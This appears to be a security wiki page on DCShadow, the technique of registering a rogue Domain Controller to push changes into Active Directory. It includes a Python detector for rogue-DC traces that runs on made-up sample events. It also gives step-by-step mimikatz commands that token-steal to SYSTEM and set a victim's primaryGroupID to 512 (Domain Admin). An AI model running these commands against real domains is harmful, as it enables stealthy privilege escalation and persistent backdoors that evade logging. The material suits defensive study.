# DCShadow

DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a Domain Controller (DC). Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.

This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://attack.mitre.org/techniques/T1178) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence.

The attack is carried out in the following steps:

* Registering the "DC" by creating two objects in the CN=Configuration partition and altering the SPN of the computer used.
* Pushing the data (triggered using DrsReplicaAdd, KCC, or other internal AD events).
* Removing the objects previously created to demote the DC.
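The registration and demotion steps above leave traces in the Configuration partition and on the rogue machine account's SPNs. The following Python is an added detection example, not part of the original page: it assumes Windows Security events 4742 (computer account changed) and 5137/5141 (directory object created/deleted) have been reduced to simple dicts, flags DC-only SPNs or server/nTDSDSA objects under CN=Sites,CN=Configuration that belong to a host not in the known-DC list, and runs over constructed sample events.

```python
from dataclasses import dataclass
from typing import Iterable, List, Optional

# SPN service classes only a genuine DC should carry: the Global Catalog SPN and the
# DRS replication SPN, whose service class is this well-known GUID.
DC_ONLY_SPN_PREFIXES = ("GC/", "E3514235-4B06-11D1-AB04-00C04FC2DCD2/")
CONFIG_SITES = ",CN=SITES,CN=CONFIGURATION,"  # where DC server/nTDSDSA objects live

@dataclass(frozen=True)
class Finding:
    event_id: int
    host: str
    reason: str

def check_event(ev: dict, known_dcs: set) -> Optional[Finding]:
    """Flag one simplified event if it ties DC-only artefacts to a host that is not a known DC."""
    if ev["EventID"] == 4742:  # computer account changed; SPN values carried in the event
        host = ev["TargetUserName"].rstrip("$").upper()
        hits = [s for s in ev.get("ServicePrincipalNames", [])
                if s.upper().startswith(DC_ONLY_SPN_PREFIXES)]
        if hits and host not in known_dcs:
            return Finding(4742, host, "DC-only SPN on non-DC: " + ", ".join(hits))
    elif ev["EventID"] in (5137, 5141):  # directory object created / deleted
        dn = ev["ObjectDN"].upper()
        if ev["ObjectClass"] in ("server", "nTDSDSA") and CONFIG_SITES in dn:
            # server: CN=<host>,CN=Servers,...   nTDSDSA: CN=NTDS Settings,CN=<host>,...
            cns = [p.split("=", 1)[1] for p in dn.split(",") if p.startswith("CN=")]
            host = cns[1] if cns[0] == "NTDS SETTINGS" else cns[0]
            if host not in known_dcs:
                what = "created" if ev["EventID"] == 5137 else "deleted"
                return Finding(ev["EventID"], host, f"{ev['ObjectClass']} object {what} under Configuration NC")
    return None

def scan(events: Iterable[dict], known_dcs: Iterable[str]) -> List[Finding]:
    dcs = {d.rstrip("$").upper() for d in known_dcs}
    return [f for f in (check_event(e, dcs) for e in events) if f is not None]

# Constructed sample events (not real logs): a legitimate DC SPN update, a workstation
# acquiring DC-only SPNs, and its server object appearing and then being removed.
SAMPLE_EVENTS = [
    {"EventID": 4742, "TargetUserName": "DC01$", "ServicePrincipalNames": ["GC/dc01.corp.local/corp.local"]},
    {"EventID": 4742, "TargetUserName": "WS01$", "ServicePrincipalNames": [
        "GC/ws01.corp.local/corp.local",
        "E3514235-4B06-11D1-AB04-00C04FC2DCD2/11111111-2222-3333-4444-555555555555/corp.local"]},
    {"EventID": 5137, "ObjectClass": "server",
     "ObjectDN": "CN=WS01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=corp,DC=local"},
    {"EventID": 5141, "ObjectClass": "nTDSDSA", "ObjectDN": "CN=NTDS Settings,CN=WS01,CN=Servers,"
     "CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=corp,DC=local"},
]
```

Calling `scan(SAMPLE_EVENTS, {"DC01"})` yields three findings against WS01 (the SPN change, the server object creation, and the nTDSDSA deletion) and none for DC01.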

It is a post-exploitation attack (also called a domination attack) because it requires **domain admin** (or enterprise admin) privileges: you need enough privileges to create a rogue Domain Controller and push changes to the DC's Active Directory objects.

To perform the attack you need two mimikatz instances. One of them starts the RPC servers with SYSTEM privileges (this is where you specify the changes you want to perform), and the other is used to push the values. So download a fresh copy of mimikatz and transfer it to the compromised workstation. Open a CMD with system privileges. Use **!+** to register the service and start it with system privileges, then use **!processtoken** to steal the SYSTEM token from the running service for the fake Domain Controller.

In this case we are changing the user's privileges from Domain User to Domain Admin. Let's change the **primaryGroupID** of **victim** to **512** (Domain Admin).

```
mimikatz1 (RPC servers)
!+
!processtoken
lsadump::dcshadow /object:victim /attribute:primaryGroupID /value:512
```

Open one more CMD with Domain Admin privileges and type the command below to push the changes to the Domain Controller.

```
mimikatz2 (push) - Needs DA or similar
lsadump::dcshadow /push
```

congratz

References for more details, as usual:

{% embed url="https://www.dcshadow.com/" %}

{% embed url="https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1207-creating-rogue-domain-controllers-with-dcshadow" %}
